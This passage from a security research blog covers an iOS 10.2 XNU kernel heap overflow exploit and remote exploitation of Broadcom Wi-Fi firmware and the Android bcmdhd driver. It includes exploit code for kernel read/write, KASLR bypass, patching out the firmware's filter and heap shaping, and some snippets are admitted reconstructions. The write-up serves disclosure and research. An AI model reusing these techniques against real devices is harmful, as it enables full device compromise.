We can now free the holder port, trigger the overflow (which will reuse the slot where holder was and overflow into first_port), then grab the slot again with another holder port:
  // free the holder:
  mach_port_destroy(mach_task_self(), holder);

  // reallocate the holder and overflow out of it
  uint64_t overflow_bytes[] = {0x1104, 0, 0, 0, 0, 0, 0, 0};
  do_overflow(0x1000, 64, overflow_bytes);

  // grab the holder again
  holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first_port to 0x1104.
After the ipc_kmsg structure has been filled in by ipc_kmsg_get_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:
void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                      ipc_kmsg_t       kmsg)
{
  ipc_kmsg_t first = queue->ikmq_base;
  ipc_kmsg_t last;

  if (first == IKM_NULL) {
    queue->ikmq_base = kmsg;
    kmsg->ikm_next = kmsg;
    kmsg->ikm_prev = kmsg;
  } else {
    last = first->ikm_prev;
    kmsg->ikm_next = first;
    kmsg->ikm_prev = last;
    first->ikm_prev = kmsg;
    last->ikm_next = kmsg;
  }
}
If the port has pending messages, the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of message sends and receives allows us to use this fact to read back the address of the second ipc_kmsg buffer:
  uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
  send_prealloc_msg(first_port, valid_header, 8);

  // send a message to the second port
  // writing a pointer to itself in the prealloc buffer
  send_prealloc_msg(second_port, valid_header, 8);

  // receive on the first port, reading the header of the second:
  uint64_t* buf = receive_prealloc_msg(first_port);

  // this is the address of second port
  kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:
void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
  struct thread_args* args = malloc(sizeof(struct thread_args));
  memset(args, 0, sizeof(struct thread_args));
  memcpy(args->buf, buf, n*8);

  args->exception_port = port;

  // start a new thread passing it the buffer and the exception port
  pthread_t t;
  pthread_create(&t, NULL, do_thread, (void*)args);

  // associate the pthread_t with the port
  // so that we can join the correct pthread
  // when we receive the exception message and it exits:
  kern_return_t err = mach_port_set_context(mach_task_self(),
                                            port,
                                            (mach_port_context_t)t);

  // wait until the message has actually been sent:
  while(!port_has_message(port)){;}
}
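port_has_message isn’t shown in the snippet; a plausible reconstruction using mach_port_get_attributes (my guess at the implementation, not necessarily the exploit’s) is:

#include <mach/mach.h>

// Returns non-zero once a message is queued on the receive right.
static int port_has_message(mach_port_t port) {
  mach_port_status_t status = {0};
  mach_msg_type_number_t count = MACH_PORT_RECEIVE_STATUS_COUNT;
  kern_return_t err = mach_port_get_attributes(
      mach_task_self(), port, MACH_PORT_RECEIVE_STATUS,
      (mach_port_info_t)&status, &count);
  return err == KERN_SUCCESS && status.mps_msgcount > 0;
}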
Remember that to get the controlled data into the port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args containing a copy of the controlled data we want in the message and the target port, then it starts a new thread which will call do_thread:
void* do_thread(void* arg) {
  struct thread_args* args = (struct thread_args*)arg;
  uint64_t buf[32];
  memcpy(buf, args->buf, sizeof(buf));

  kern_return_t err;
  err = thread_set_exception_ports(mach_thread_self(),
                                   EXC_MASK_ALL,
                                   args->exception_port,
                                   EXCEPTION_STATE,
                                   ARM_THREAD_STATE64);
  free(args);

  load_regs_and_crash(buf);
  return NULL;
}
do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.
At this point the kernel’s interrupt handler will call exception_deliver, which will look up the thread’s exception port and call the MIG mach_exception_raise_state method. That will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body, which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field, and use it to align the sent message to what it believes to be the end of the buffer:

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?
Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.
We observed before that if a port’s message queue is empty when a message is enqueued, the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting its header with one which keeps the ipc_kmsg valid and unused) and then reading back the message sent to first_port, we can determine the address of the second port’s ipc_kmsg buffer.
read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.
For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.
Whoever developed that exploit had found that the IOKit OSSerializer::serialize method is a very neat gadget which turns the ability to call a function with one argument pointing to controlled data into the ability to call another controlled function with two completely controlled arguments.
In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.
Let’s free second_port and reallocate an IOKit userclient there:
  // send another message on first
  // writing a valid, safe header back over second
  send_prealloc_msg(first_port, valid_header, 8);

  // free second and get it reallocated as a userclient:
  mach_port_deallocate(mach_task_self(), second_port);
  mach_port_destroy(mach_task_self(), second_port);

  mach_port_t uc = alloc_userclient();

  // read back the start of the userclient buffer:
  buf = receive_prealloc_msg(first_port);

  // save a copy of the original object:
  memcpy(legit_object, buf, sizeof(legit_object));

  // this is the vtable for AGXCommandQueue
  uint64_t vtable = buf[0];
alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.
Note that we sent another message with a valid header to first_port, which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client, we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable; using this we can determine the KASLR slide and thus work out the address of OSSerializer::serialize.
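Computing the slide is then a single subtraction; the unslid constants below are placeholders which would come from statically reversing the matching kernelcache, not real values:

  // Placeholders: static (unslid) addresses from the kernelcache.
  const uint64_t AGXCOMMANDQUEUE_VTABLE_UNSLID = 0xfffffff000000000;
  const uint64_t OSSERIALIZER_SERIALIZE_UNSLID = 0xfffffff000000000;

  uint64_t kaslr_slide = vtable - AGXCOMMANDQUEUE_VTABLE_UNSLID;
  uint64_t osserializer_serialize =
      OSSERIALIZER_SERIALIZE_UNSLID + kaslr_slide;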
Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().
Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:
class OSSerializer : public OSObject
{
  OSDeclareDefaultStructors(OSSerializer)

  void * target;
  void * ref;
  OSSerializerCallback callback;

  virtual bool serialize(OSSerialize * serializer) const;
};

bool OSSerializer::serialize( OSSerialize * s ) const
{
  return( (*callback)(target, ref, s) );
}
It’s clearer what’s going on if we look at the disassembly of OSSerializer::serialize:
; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
Functions like copyin and copyout are the obvious candidates, as they will handle any complexities involved in copying across the user/kernel boundary, but they both take three arguments (source, destination and size) and we can only completely control two.
However, since we already have the ability to read and write this fake object from userspace, we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments, so what we need is a wrapper around one of those which passes a fixed size.
Looking through the cross-references to those functions we find uuid_copy:
; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove
This function is just a simple wrapper around memmove which always passes a fixed size of 16 bytes. Let’s integrate that final primitive into the serializer gadget:

To turn the write into a read we just swap the order of the arguments, copying from an arbitrary address into our fake userclient object, and then receive the exception message to read back the data.
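Putting the offsets from the disassembly together, the fake object might be laid out like this (a sketch: the field offsets follow the disassembly above, but the refcount value and the vtable slot used for ::release are my assumptions):

#include <stdint.h>

// Builds the fake object in the 240 controlled bytes. obj_kaddr is
// the leaked kernel address of this buffer; calling ::release on the
// fake object then becomes uuid_copy(dst, src).
void build_fake_object(uint64_t* obj, uint64_t obj_kaddr,
                       uint64_t osserializer_serialize,
                       uint64_t uuid_copy, uint64_t src, uint64_t dst) {
  obj[0] = obj_kaddr;               // vtable pointer aimed back at the object
  obj[1] = 0x10001;                 // plausible refcount bits (assumption)
  obj[2] = dst;                     // +0x10 -> loaded into X0 (memmove dst)
  obj[3] = src;                     // +0x18 -> loaded into X1 (memmove src)
  obj[4] = uuid_copy;               // +0x20 -> loaded into X3, branched to
  obj[5] = osserializer_serialize;  // assumed ::release vtable slot
}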
You can download my exploit for iOS 10.2 on iPod 6G here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004#c4
This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.
Critical code should be criticised

Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.
Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.
XNU is not alone in this; it’s a common story across many codebases. For example, LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation. For extra irony, the custom syscall collided with the syscall number of sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.
Categories: Security

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 2)

Tue, 04/11/2017 - 13:03
Posted by Gal Beniamini, Project Zero
In this blog post we'll continue our journey into gaining remote kernel code execution, by means of Wi-Fi communication alone. Having previously developed a remote code execution exploit giving us control over Broadcom’s Wi-Fi SoC, we are now left with the task of exploiting this vantage point in order to further elevate our privileges into the kernel.

In this post, we’ll explore two distinct avenues for attacking the host operating system. In the first part, we’ll discover and exploit vulnerabilities in the communication protocols between the Wi-Fi firmware and the host, resulting in code execution within the kernel. Along the way, we’ll also observe a curious vulnerability which persisted until quite recently, using which attackers were able to directly attack the internal communication protocols without having to exploit the Wi-Fi SoC in the first place! In the second part, we’ll explore hardware design choices allowing the Wi-Fi SoC in its current configuration to fully control the host without requiring a vulnerability in the first place.
While the vulnerabilities discussed in the first part have been disclosed to Broadcom and are now fixed, the utilisation of hardware components remains as it is, and is currently not mitigated against. We hope that by publishing this research, mobile SoC manufacturers and driver vendors will be encouraged to create more secure designs, allowing a better degree of separation between the Wi-Fi SoC and the application processor.

Part 1 - The “Hard” Way

The Communication Channel
As we’ve established in the previous blog post, the Wi-Fi firmware produced by Broadcom is a FullMAC implementation. As such, it’s responsible for handling much of the complexity required for the implementation of 802.11 standards (including the majority of the MLME layer).
Yet, while many of the operations are encapsulated within the Wi-Fi chip’s firmware, some degree of control over the Wi-Fi state machine is required within the host’s operating system. Certain events cannot be handled solely by the Wi-Fi SoC, and must therefore be communicated to the host’s operating system. For example, the host must be notified of the results of a Wi-Fi scan in order to be able to present this information to the user.
In order to facilitate these cases where the host and the Wi-Fi SoC wish to communicate with one another, a special communication channel is required.
However, recall that Broadcom produces a wide range of Wi-Fi SoCs, which may be connected to the host via many different interfaces (including USB, SDIO or even PCIe). This means that relying on the underlying communication interface might require re-implementing the shared communication protocol for each of the supported channels -- quite a tedious task.

Perhaps there’s an easier way? Well, one thing we can always be certain of is that regardless of the communication channel used, the chip must be able to transmit received frames back to the host. Indeed, perhaps for the very same reason, Broadcom chose to piggyback on top of this channel in order to create the communication channel between the SoC and the host.
When the firmware wishes to notify the host of an event, it does so by simply encoding a “special” frame and transmitting it to the host. These frames are marked by a “unique” EtherType value of 0x886C. They do not contain actual received data, but rather encapsulate information about firmware events which must be handled by the host’s driver.

Securing the Channel
Now, let’s switch over to the host’s side. On the host, the driver can logically be divided into several layers. The lower layers deal with the communication interface itself (such as SDIO, PCIe, etc.) and whatever transmission protocol may be tied to it. The higher layers then deal with the reception of frames, and their subsequent processing (if necessary).
First, the upper layers perform some initial processing on the received frames, such as removing encapsulated data which may have been added on top of them (for example, transmission power indicators added by the PHY module). Then, an important distinction must be made - is this a regular frame that should be simply forwarded to the relevant network interface, or is it in fact an encoded event that the host must handle?
As we’ve just seen, this distinction is easily made! Just take a look at the ethertype and check whether it has the “special” value of 0x886C. If so, handle the encapsulated event and discard the frame.
Or is it?
In fact, there is no guarantee that this ethertype is unused in every single network and by every single device. Incidentally, it seems that the very same ethertype is used for the LARQ protocol used in HPNA chips (initially developed by Epigram, and subsequently purchased by Broadcom).
Regardless of this little oddity - this brings us to our first question: how can the Wi-Fi SoC and host driver distinguish between externally received frames with the 0x886C ethertype (which should be forwarded to the network interface), and internally generated event frames (which should not be received from external sources)?
This is a crucial question; the internal event channel, as we’ll see shortly, is extremely powerful and provides a huge, mostly unaudited, attack surface. If attackers are able to inject frames over-the-air that can subsequently be processed as event frames by the driver, they may very well be able to achieve code execution within the host’s operating system.
Well… Until several months prior to this research (mid 2016), the firmware made no effort to filter these frames. Any frame received as part of the data RX-path, regardless of its ethertype, was simply forwarded blindly to the host. As a result, attackers were able to remotely send frames containing the special 0x886C ethertype, which were then processed by the driver as if they were event frames created by the firmware itself!
So how was this issue addressed? After all, we’ve already established that just filtering the ethertype itself is not sufficient. Observing the differences between the pre- and post- patched versions of the firmware reveals the answer: Broadcom went for a combined patch, targeting both the Wi-Fi SoC’s firmware and the host’s driver.
The patch adds a validation method (is_wlc_event_frame) both to the firmware’s RX path, and to the driver. On the chip’s  side, the validation method is called immediately before transmitting a received frame to the host. If the validation method deems the frame to be an event frame, it is discarded. Otherwise, the frame is forwarded to the driver. Then, the driver calls the exact same verification method on received frames with the 0x886C ethertype, and processes them only if they pass the same validation method. Here is a short schematic detailing this flow:

As long as the validation methods in the driver and the firmware remain identical, externally received frames cannot be processed as events by the driver. So far so good.
However… Since we already have code-execution on the Wi-Fi SoC, we can simply “revert” the patch. All it takes is for us to “patch out” the validation method in the firmware, thereby causing any received frame to once again be forwarded blindly to the host. This, in turn, allows us to inject arbitrary messages into the communication protocol between the host and the Wi-Fi chip. Moreover, since the validation method is stored in RAM, and all of RAM is marked as RWX, this is as simple as writing “MOV R0, #0; BX LR” to the function’s prologue.
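In Thumb encoding those two instructions are just four bytes. A minimal sketch of the patch, assuming a hypothetical firmware_write helper standing in for the memory-write primitive from the previous post, and with a placeholder address for is_wlc_event_frame:

#include <stdint.h>

/* Neutralise is_wlc_event_frame in firmware RAM so that every received
 * frame is once again forwarded blindly to the host. */
#define IS_WLC_EVENT_FRAME_ADDR 0x0 /* placeholder: recovered by reversing the RAM image */

extern void firmware_write(uint32_t addr, const void *data, uint32_t len);

void unpatch_event_filter(void)
{
  /* Thumb: MOVS R0, #0 (0x2000) ; BX LR (0x4770) -> "return 0" */
  static const uint16_t stub[2] = { 0x2000, 0x4770 };
  firmware_write(IS_WLC_EVENT_FRAME_ADDR, stub, sizeof(stub));
}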

The Attack Surface
As we mentioned earlier, the attack surface exposed by the internal communication channel is huge. Tracing the control flow from the entry point for handling event frames (dhd_wl_host_event), we can see that several events receive “special treatment”, and are processed independently (see wl_host_event and wl_show_host_event). Once the initial treatment is done, the frames are inserted into a queue. Events are then dequeued by a kernel thread whose sole purpose is to read events from the queue and dispatch them to their corresponding handler function. This correlation is done by using the event’s internal “event-type” field as an index into an array of handler functions, called evt_handler.

While there are up to 144 different supported event codes, the host driver for Android, bcmdhd, only supports a much smaller subset of these. Nonetheless, about 35 events are supported within the driver, each with its own elaborate handler.
Now that we’re convinced that the attack surface is large enough, we can start hunting for bugs! Unfortunately, it seems that the Wi-Fi chip is considered “trusted”; as a result, some of the validations in the host’s driver are insufficient… Indeed, auditing the relevant handler functions and auxiliary protocol handlers outlined above, we find a substantial number of vulnerabilities.

The Vulnerability
Taking a closer look at the vulnerabilities we’ve found, we can see that they all differ from one another slightly. Some allow for relatively strong primitives, some weaker. However, most importantly, many of them have various preconditions which must be fulfilled to successfully trigger them; some are limited to certain physical interfaces, while others work only in certain configurations of the driver. Nonetheless, one vulnerability seems to be present in all versions of bcmdhd and in all configurations - if we can successfully exploit it, we should be set.
Let’s take a closer look at the event frame in question. Events of type "WLC_E_PFN_SWC" are used to indicate that a “Significant Wi-Fi Change” (SWC) has occurred within the firmware and must be handled by the host. Instead of directly handling these events, the host’s driver simply gathers all the transferred data from the firmware, and broadcasts a “vendor event” packet via Netlink to the cfg80211 layer.
More concretely, each SWC event frame transmitted by the firmware contains an array of events (of type wl_pfn_significant_net_t), a total count (total_count), and the number of events in the array (pkt_count). Since the total number of events can be quite large, it might not fit in a single frame (i.e., it might be larger than the maximal MSDU). In this case, multiple SWC event frames can be sent consecutively - their internal data will be accumulated by the driver until the total count is reached, at which point the driver will process the entire list of events.
Reading through the driver’s code, we can see that when this event code is received, an initial handler is triggered in order to deal with the event. The handler then internally calls into the "dhd_handle_swc_evt" function in order to process the event's data. Let’s take a closer look:
void *dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes)
{
    ...
    wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
    ...
    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
    params = &(gscan_params->param_significant);
    ...
    if (!params->results_rxed_so_far) {
        if (!params->change_array) {
            params->change_array = (wl_pfn_significant_net_t *)
                                    kmalloc(sizeof(wl_pfn_significant_net_t) *
                                            results->total_count, GFP_KERNEL);
            ...
        }
    }
    ...
    change_array = &params->change_array[params->results_rxed_so_far];
    memcpy(change_array,
           results->list,
           sizeof(wl_pfn_significant_net_t) * results->pkt_count);
    params->results_rxed_so_far += results->pkt_count;
    ...
}
(where "event_data" is the arbitrary data encapsulated in the event passed in from the firmware)
As we can see above, the function first allocates an array to hold the total count of events (if one hasn’t been allocated before) and then proceeds to concatenate the encapsulated data starting from the appropriate index (results_rxed_so_far) in the buffer.
However, the handler fails to verify the relation between the total_count and the pkt_count! It simply “trusts” the assertion that the total_count is sufficiently large to store all the subsequent events passed in. As a result, an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.
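Schematically, the mismatch can be expressed as follows; the structure mirrors the shape of wl_pfn_swc_results_t, but the field layout and the 64-byte entry size are illustrative, not the real bcmdhd definitions:

#include <stdint.h>

/* Illustrative shape of an SWC event payload (not the exact driver structs). */
struct swc_net { uint8_t data[64]; };

struct swc_results {
  uint32_t version;
  uint32_t pkt_count;    /* entries carried in THIS frame              */
  uint32_t total_count;  /* sizes the kmalloc'ed accumulation buffer   */
  struct swc_net list[];
};

/* The driver allocates total_count entries once, then memcpy's
 * pkt_count entries per frame with no cross-check. So: */
void make_overflowing_frame(struct swc_results *evt)
{
  evt->total_count = 16; /* small buffer: 16 * 64 = 1024 bytes here          */
  evt->pkt_count   = 20; /* copies 20 entries: 256 bytes past the buffer end */
}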
Remote Kernel Heap Shaping

This is all well and good, but how can we leverage this primitive from a remote vantage point? As we’re not locally present on the device, we’re unable to gather any data about the current state of the heap, nor do we have address-space related information (unless, of course, we’re able to somehow leak this information). Many classic exploits targeting kernel heap overflows rely on the ability to shape the kernel’s heap, ensuring a certain state prior to triggering an overflow - an ability we also lack at the moment.
What do we know about the allocator itself? There are a few possible underlying implementations for the kmalloc allocator (SLAB, SLUB, SLOB), configurable when building the kernel. However, on the vast majority of devices, kmalloc uses “SLUB” - an unqueued “slab allocator” with per-CPU caches.
Each “slab” is simply a small region from which identically-sized allocations are carved. The first chunk in each slab contains its metadata (such as the slab’s freelist), and subsequent blocks contain the allocations themselves, with no inline metadata. There are a number of predefined slab size-classes which are used by kmalloc, typically spanning from as little as 64 bytes, to around 8KB. Unsurprisingly, the allocator uses the best-fitting slab (smallest slab that is large enough) for each allocation. Lastly, the slabs’ freelists are consumed linearly - consecutive allocations occupy consecutive memory addresses. However, if objects are freed within the slab, it may become fragmented - causing subsequent allocations to fill-in “holes” within the slab instead of proceeding linearly.

With this in mind, let’s take a step back and analyse the primitives at hand. First, since we are able to arbitrarily specify any value in total_count, we can choose the overflown buffer’s size to be any multiple of sizeof(wl_pfn_significant_net). This means we can inhabit any slab cache size of our choosing. As such, there’s no limitation on the size of the objects we can target with the overflow. However, this is not quite enough… For starters, we still don’t know anything about the current state of the slabs themselves, nor can we trigger remote allocations in slabs of our choosing.
It seems that first and foremost, we need to find a way to remotely shape slabs. Recall, however, that there are a few obstacles we need to overcome. As SLUB maintains per-CPU caches, the affinity of the kernel thread in which the allocation is performed must be the same as the one from which the overflown buffer is allocated. Gaining a heap shaping primitive on a different CPU core will cause the allocations to be taken from different slabs. The most straightforward way to tackle this issue is to confine ourselves to heap shaping primitives which can be triggered from the same kernel thread on which the overflow occurs. This is quite a substantial constraint… In essence, it forces us to disregard allocations that occur as a result of processes that are external to the event handling itself.
Regardless, with a concrete goal in mind, we can start looking for heap shaping primitives in the registered handlers for each of the event frames. As luck would have it, after going through every handler, we come across a (single) perfect fit!
Event frames of type “WLC_E_PFN_BSSID_NET_FOUND” are handled by the handler function dhd_handle_hotlist_scan_evt. This function accumulates a linked list of scan results. Every time an event is received, its data is appended to the list. Finally, when an event arrives with a flag indicating it is the last event in the chain, the function passes on the collected list of events to be processed. Let’s take a closer look:
void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,
                                  int *send_evt_bytes, hotlist_type_t type)
{
    struct dhd_pno_gscan_params *gscan_params;
    wl_pfn_scanresults_t *results = (wl_pfn_scanresults_t *)event_data;
    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
    ...
    malloc_size = sizeof(gscan_results_cache_t) +
                  ((results->count - 1) * sizeof(wifi_gscan_result_t));
    gscan_hotlist_cache = (gscan_results_cache_t *)kmalloc(malloc_size, GFP_KERNEL);
    ...
    gscan_hotlist_cache->next = gscan_params->gscan_hotlist_found;
    gscan_params->gscan_hotlist_found = gscan_hotlist_cache;
    ...
    gscan_hotlist_cache->tot_count = results->count;
    gscan_hotlist_cache->tot_consumed = 0;
    plnetinfo = results->netinfo;
    for (i = 0; i < results->count; i++, plnetinfo++) {
        hotlist_found_array = &gscan_hotlist_cache->results[i];
        ... // Populate the entry with the sanitised network information
    }
    if (results->status == PFN_COMPLETE) {
        ... // Process the entire chain
    }
    ...
}
Awesome - looking at the function above, it seems that we’re able to repeatedly cause allocations of size { sizeof(gscan_results_cache_t) + (N-1) * sizeof(wifi_gscan_result_t) | N > 0 } (where N denotes results->count). What’s more, these allocations are performed in the same kernel thread, and their lifetime is completely controlled by us! As long as we don’t send an event with the PFN_COMPLETE status, none of the allocations will be freed.
Before we move on, we’ll need to choose a target slab size. Ideally, we’re looking for a slab that’s relatively inactive. If other threads on the same CPU choose to allocate (or free) data from the same slab, this would add uncertainty to the slab’s state and may prevent us from successfully shaping it. After looking at /proc/slabinfo and tracing kmalloc allocations for every slab with the same affinity as our target kernel thread, it seems that the kmalloc-1024 slab is mostly inactive. As such, we’ll choose to target this slab size in our exploit.
By using the heap shaping primitive above we can start filling slabs of any given size with  “gscan” objects. Each “gscan” object has a short header containing some metadata relating to the scan and a pointer to the next element in the linked list. The rest of the object is then populated by an inline array of “scan results”, carrying the actual data for this node.
Going back to the issue at hand - how can we use this primitive to craft a predictable layout?
Well, by combining the heap shaping primitive with the overflow primitive, we should be able to properly shape slabs of any size-class prior to triggering the overflow. Recall that initially any given slab may be fragmented, like so:

However, after triggering enough allocations (e.g. (SLAB_TOTAL_SIZE / SLAB_OBJECT_SIZE) - 1) with our heap shaping primitive, all the holes (if present) in the current slab should get populated, causing subsequent allocations of the same size-class to be placed consecutively.
Now, we can send a single crafted SWC event frame, indicating a total_count resulting in an allocation from the same target slab. However, we don’t want to trigger the overflow yet! We still have to shape the current slab before we do so. To prevent the overflow from occurring, we’ll provide a small pkt_count, thereby only partially filling in the buffer.
Finally, using the heap shaping primitive once again, we can fill the rest of the slab with more of our “gscan” objects, bringing us to the following heap state:

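In code, the whole shaping-and-overflow sequence might look roughly like the following sketch; inject_hotlist_frame and inject_swc_frame are placeholders for transmitting crafted 0x886C event frames from the compromised firmware, and all counts are illustrative:

/* Placeholders for sending crafted event frames from the firmware;
 * the signatures and counts below are illustrative assumptions. */
extern void inject_hotlist_frame(int count, int complete);
extern void inject_swc_frame(int total_count, int pkt_count);

#define OBJS_PER_SLAB 4  /* e.g. a 4KB slab of kmalloc-1024 objects            */
#define HOTLIST_COUNT 9  /* assumed N placing the gscan object in kmalloc-1024 */
#define SWC_TOTAL     16 /* assumed total_count landing in kmalloc-1024        */

void shape_and_overflow(void)
{
  int i;

  /* 1. Plug any freelist holes so new allocations become consecutive. */
  for (i = 0; i < OBJS_PER_SLAB - 1; i++)
    inject_hotlist_frame(HOTLIST_COUNT, 0);

  /* 2. Allocate the victim buffer, only partially filled: no overflow yet. */
  inject_swc_frame(SWC_TOTAL, 1);

  /* 3. Surround it with "gscan" objects whose lifetime we control. */
  for (i = 0; i < OBJS_PER_SLAB; i++)
    inject_hotlist_frame(HOTLIST_COUNT, 0);

  /* 4. Overflow out of the victim buffer into the adjacent gscan object,
   *    corrupting its "next" pointer with a chosen value. */
  inject_swc_frame(SWC_TOTAL, SWC_TOTAL + 2);

  /* 5. A completion frame (status == PFN_COMPLETE) walks the corrupted
   *    list, processing and kfree-ing our crafted pointer. */
  inject_hotlist_frame(HOTLIST_COUNT, 1);
}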
Okay… We’re getting there! As we can see above, if we choose to use the overflow primitive at this point, we could overwrite the contents of one of the “gscan” objects with our own arbitrary data. However, we’ve yet to determine exactly what kind of result that would yield…

Analysing The Constraints
In order to determine the effect of overwriting a “gscan” object, let’s take a closer look at the flow that processes a chain of “gscan” objects (that is, the operations performed after an event with a “completion” flag is received). This processing is handled by wl_cfgvendor_send_hotlist_event. The function goes over each of the events in the list, packs the event’s data into an SKB, and subsequently broadcasts the SKB over Netlink to any potential listeners.
However, the function does have a certain obstacle it needs to overcome; any given “gscan” node may be larger than the maximal size of an SKB. Therefore, the node would need to be split into several SKBs. To keep track of this information, the “tot_count” and “tot_consumed” fields in the “gscan” structure are utilised. The “tot_count” field indicates the total number of embedded scan result entries in the node’s inline array, and the “tot_consumed” field indicates the number of entries consumed (transmitted) so far.
As a result, the function slightly modifies the contents of the list while processing it. Essentially, it enforces the invariant that each processed node’s “tot_consumed” field will be modified to match its “tot_count” field. As for the data being transmitted and how it’s packed, we’ll skip those details for brevity’s sake. However, it’s important to note that other than the aforementioned side effect, the function above appears to be quite harmless (that is, no further primitives can be “mined” from it). Lastly, after all the events are packed into SKBs and transmitted to any listeners, they can finally be reclaimed. This is achieved by simply walking over the list, and calling “kfree” on each entry.
Putting it all together, where does this leave us with regards to exploitation? Assuming we choose to overwrite one of the “gscan” entries using the overflow primitive, we can modify its “next” field (or rather, must, as it is the first field in the structure) and point it at any arbitrary address. This would cause the processing function to use this arbitrary pointer as if it were an element in the list.
Due to the invariant of the processing function - after processing the crafted entry, its 7th byte (“tot_consumed”) will be modified to match its 6th byte (“tot_count”). In addition, the pointer will then be kfree-d after processing the chain. What’s more, recall that the processing function iterates over the entire list of entries. This means that the first four bytes in the crafted entry (its “next” field) must either point to another memory location containing a “valid” list node (which must then satisfy the same constraints), or must otherwise hold the value 0 (NULL), indicating that this is the last element in the list.
This doesn’t look easy… There’s quite a large number of constraints we need to consider. If we willfully choose to ignore the kfree for a moment, we could try and search for memory locations where the first four bytes are zero, and where it would be beneficial to modify the 7th byte to match the 6th. Of course, this is just the tip of the iceberg; we could repeatedly trigger the same primitive in order to repeatedly copy bytes one position to the left. Perhaps, if we were able to locate a memory address where enough zero bytes and enough bytes of our choosing are present, we could craft a target value by consecutively using these two primitives.
In order to gauge the feasibility of this approach, I’ve encoded the constraints above in a small SMT instance (using Z3), and supplied the actual heap data from the kernel, along with various target values and their corresponding locations. Additionally, since the kernel’s translation table is stored at a constant address in the kernel’s VAS and even slight modifications to it can result in exploitable conditions, its contents (along with corresponding target values) were added to the SMT instance as well. The instance was constructed to be satisfiable if and only if any of the target values could occupy any of the target locations within no more than ten “steps” (where each step is an invocation of the primitive). Unfortunately, the results were quite grim… It seemed like this approach just wasn’t powerful enough.
